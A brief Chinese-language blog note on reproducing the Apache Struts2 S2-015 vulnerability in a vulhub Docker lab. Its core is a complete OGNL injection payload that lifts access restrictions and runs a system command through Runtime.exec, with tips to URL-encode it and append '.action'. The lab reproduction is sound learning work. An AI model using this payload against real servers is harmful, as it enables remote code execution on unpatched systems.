apache struts2 s2-015复现

使用vulhub搭建

docker-compose build

docker-compose up -d

 

 访问8080端口，进去是空白的

抓包使用exp

${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream()),#q}

这个需要进行url编码

 

这个需要在最后加上.action

我不会java，就没想了解原理，只想复现一下，希望在遇到的时候不要手生就好

我自己写的脚本就不放出来了，没啥技术含量